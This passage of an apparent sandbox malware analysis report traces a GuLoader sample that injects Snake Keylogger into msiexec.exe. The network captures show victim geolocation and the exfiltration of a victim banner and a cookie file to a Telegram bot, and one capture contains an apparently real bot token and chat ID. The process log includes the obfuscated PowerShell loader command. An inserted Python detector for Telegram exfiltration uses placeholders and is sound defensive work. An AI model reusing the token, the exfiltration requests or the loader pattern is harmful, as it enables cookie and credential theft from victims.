  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N5QiQeftP4i9AsPKF2BZjrCDqGjLuWohvtpD5ioM0jxvUoJcHM7JGlMAA7vVBZXnRqRA5cF%2FtA4JaXOt0h7%2FvnKmmf9CSA9SBA2WPfQJtP2Hvp40vQqdkIWwAe4izJ%2Bxe3q7Wl8N"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 9150c092592941a6-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1614&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1798029&cwnd=245&unsent_bytes=0&cid=4c9142342f1e67b4&ts=183&x=0"
2025-02-20 19:02:39 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 9
Source IP: 192.168.2.7
Source Port: 49991
Destination IP: 104.21.32.14
Destination Port: 443
PID: 8180
Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:41 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
2025-02-20 19:02:41 UTC | 860 | IN | HTTP/1.1 200 OK
  Date: Thu, 20 Feb 2025 19:02:41 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 309929
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Mon, 17 Feb 2025 04:57:11 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I3dT41tQWTAPPn6ihwihkY00caQknkJgTWL8trQ80t%2BJ4ydM2%2B1wtJO07sXZ7jHy9%2B%2FqhSxXiXLeVuadF19f7aYnzAnkTuiNJcOSYtqyJu0%2BhMeRIP5bO07a5lJOe6%2FMAfQwft4T"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 9150c09adb9b4344-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1698&rtt_var=645&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1719670&cwnd=137&unsent_bytes=0&cid=479418c3109cf0dd&ts=135&x=0"
2025-02-20 19:02:41 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 10
Source IP: 192.168.2.7
Source Port: 49993
Destination IP: 104.21.32.14
Destination Port: 443
PID: 8180
Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:42 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2025-02-20 19:02:42 UTC | 851 | IN | HTTP/1.1 200 OK
  Date: Thu, 20 Feb 2025 19:02:42 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 309930
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Mon, 17 Feb 2025 04:57:11 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ze2a8GWhBcoB1lBhOxsxC6qk6Ki8OlqBXDWKQUhYHZbOKNVpRWx8JWpMxeVa%2BoQBsW5hh6yDKXpwl4BNDyJD1CPDkjq7gsVdT1DRpxy4qJaikTJWW7U3b5%2Fi9dRO30WK3IZNKbJA"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 9150c0a36d088ce6-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1801&rtt_var=900&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=172373&cwnd=172&unsent_bytes=0&cid=7514f8fc08e3b0e9&ts=187&x=0"
2025-02-20 19:02:42 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49994 | 149.154.167.220 | 443 | 8180 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:43 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20and%20Time:%2021/02/2025%20/%2004:32:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20320946%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2025-02-20 19:02:43 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Thu, 20 Feb 2025 19:02:43 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-02-20 19:02:43 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49995 | 149.154.167.220 | 443 | 8180 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:50 UTC | 358 | OUT | POST /bot7905739203:AAHVrbaqwZh7jsUdl3dYwh5_SurA4XOPFCU/sendDocument?chat_id=8187594209&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd5298a6722ded
Host: api.telegram.org
Content-Length: 1282
2025-02-20 19:02:50 UTC | 1282 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 32 39 38 61 36 37 32 32 64 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 33 32 30 39 34 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 30 2f 30 32 2f 32 30
Data Ascii: --------------------------8dd5298a6722dedContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:320946Date and Time: 20/02/20
2025-02-20 19:02:50 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 20 Feb 2025 19:02:50 GMT
Content-Type: application/json
Content-Length: 506
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-02-20 19:02:50 UTC | 506 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 30 35 37 33 39 32 30 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 74 72 61 64 69 6e 67 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 72 61 64 69 6e 67 70 61 74 7a 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 38 31 38 37 35 39 34 32 30 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 55 67 6f 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 34 30 30 37 38 31 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 2c
Data Ascii: {"ok":true,"result":{"message_id":17,"from":{"id":7905739203,"is_bot":true,"first_name":"trading","username":"tradingpatz_bot"},"chat":{"id":8187594209,"first_name":"Ugo","type":"private"},"date":1740078170,"document":{"file_name":"Cookies_Recovered.txt",
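The two msiexec.exe sessions above are the injected Snake Keylogger payload pushing its victim banner (sendMessage) and a cookie dump (sendDocument) to a Telegram bot. As an added example that is not part of the Joe Sandbox report, the Python below turns captured requests of that shape into a finding carrying the IOCs an analyst wants from such a session (bot id, redacted bot token, chat_id, calling process, decoded banner). It also handles the report's first request, which carries no bot token and no chat_id and is rejected with 404, but is still a detection hit. The HttpRequest fields, the sample records, FAKE_TOKEN and the chat_id value are constructed placeholders, not the values from the capture.

```python
"""Flag Telegram Bot API use in captured HTTP requests and extract C2 IOCs.

Added example, not part of the sandbox report. Sample records are constructed
to mirror the report's msiexec.exe -> api.telegram.org sessions; the token and
chat_id are placeholders of the right shape, not the captured values.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Telegram Bot API request-target shape: /bot<token>/<method>?<params>.
# The token group is optional on purpose: the report's first request is
# "GET /bot/sendMessage?chat_id=&text=..." (no token, no chat_id), which the
# API answers with 404, yet the attempt itself is the indicator.
TELEGRAM_PATH = re.compile(
    r"^/bot(?P<token>\d+:[A-Za-z0-9_-]{30,})?/(?P<method>[A-Za-z]+)$"
)
# Bot API methods a stealer uses to push data out; other methods are still
# reported, at lower severity.
EXFIL_METHODS = {"sendMessage", "sendDocument", "sendPhoto"}
# Living-off-the-land images that never need Telegram; in this report GuLoader
# injects the Snake Keylogger payload into msiexec.exe.
SUSPICIOUS_IMAGES = {"msiexec.exe", "regsvr32.exe", "installutil.exe", "regasm.exe"}


@dataclass
class HttpRequest:
    process: str   # image path of the process owning the socket (sandbox PID -> path)
    dst_ip: str
    dst_port: int
    verb: str      # HTTP method
    target: str    # request-target as sent: path plus query string
    host: str      # Host header


@dataclass
class Finding:
    severity: str
    reason: str
    iocs: dict = field(default_factory=dict)


def redact_token(token: str) -> str:
    """Keep the numeric bot id (the stable IOC) and hide the secret half."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{secret[:4]}...[redacted]"


def analyze(req: HttpRequest) -> Finding | None:
    """Return a Finding if the request is a Telegram Bot API call, else None."""
    if req.host.lower() != "api.telegram.org":
        return None
    parts = urlsplit(req.target)
    m = TELEGRAM_PATH.match(parts.path)
    if m is None:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # values are already URL-decoded
    token = m.group("token") or ""
    api_method = m.group("method")
    chat_id = params.get("chat_id", [""])[0] or None
    # text= (sendMessage) or caption= (sendDocument) carries the victim banner
    banner = (params.get("text") or params.get("caption") or [""])[0]

    iocs = {
        "bot_id": token.split(":")[0] if token else None,
        "bot_token": redact_token(token) if token else None,
        "chat_id": chat_id,
        "api_method": api_method,
        "dst_ip": req.dst_ip,
        "process": req.process,
        "banner": banner.replace("\r\n", " ").strip()[:80],
    }
    severity = "high" if api_method in EXFIL_METHODS else "medium"
    notes = [f"{req.verb} {api_method} to api.telegram.org from {req.process}"]
    if not token:
        notes.append("empty bot token (server answers 404; the attempt is still the indicator)")
    image = req.process.rsplit("\\", 1)[-1].lower()
    if image in SUSPICIOUS_IMAGES:
        notes.append(f"{image} has no business talking to Telegram: likely injected payload")
    return Finding(severity, "; ".join(notes), iocs)


def scan(requests: list[HttpRequest]) -> list[Finding]:
    return [f for f in (analyze(r) for r in requests) if f is not None]


# Constructed sample modelled on the report's sessions 11 and 12 (placeholders).
FAKE_TOKEN = "1234567890:AAH" + "x" * 32
MSIEXEC = r"C:\Windows\SysWOW64\msiexec.exe"
SAMPLE_REQUESTS = [
    HttpRequest(MSIEXEC, "149.154.167.220", 443, "GET",
                "/bot/sendMessage?chat_id=&text=%20%0D%0APC%20Name:HOST01", "api.telegram.org"),
    HttpRequest(MSIEXEC, "149.154.167.220", 443, "POST",
                f"/bot{FAKE_TOKEN}/sendDocument?chat_id=1111111111&caption=Cookies%20%7C%20user",
                "api.telegram.org"),
    HttpRequest(r"C:\Program Files\Vendor\updater.exe", "203.0.113.10", 443, "GET",
                "/updates/latest.json", "updates.example.com"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding.severity.upper(), finding.reason)
        print("   ", finding.iocs)
```

The bot id is kept in clear because it is what you pivot on across samples; the secret half of the token is redacted so the finding can be shared without handing out a working C2 credential. Pair the request-level check with a process-level one (any LOLBin image resolving api.telegram.org is the stronger signal), since the HTTPS body is only visible with TLS inspection or in a sandbox.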



                                                                                                                                                    Target ID:1
                                                                                                                                                    Start time:14:01:20
                                                                                                                                                    Start date:20/02/2025
                                                                                                                                                    Path:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\rAntephialtic.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:1'542'704 bytes
                                                                                                                                                    MD5 hash:65249FEBEC3F7BDE1C51B92FF5D3C4A7
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:14:01:24
                                                                                                                                                    Start date:20/02/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)"
                                                                                                                                                    Imagebase:0xfa0000
                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.1830778551.000000000CF10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:4
                                                                                                                                                    Start time:14:01:24
                                                                                                                                                    Start date:20/02/2025
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:6
                                                                                                                                                    Start time:15:57:12
                                                                                                                                                    Start date:20/02/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                    Imagebase:0x420000
                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2558138839.0000000025871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:false
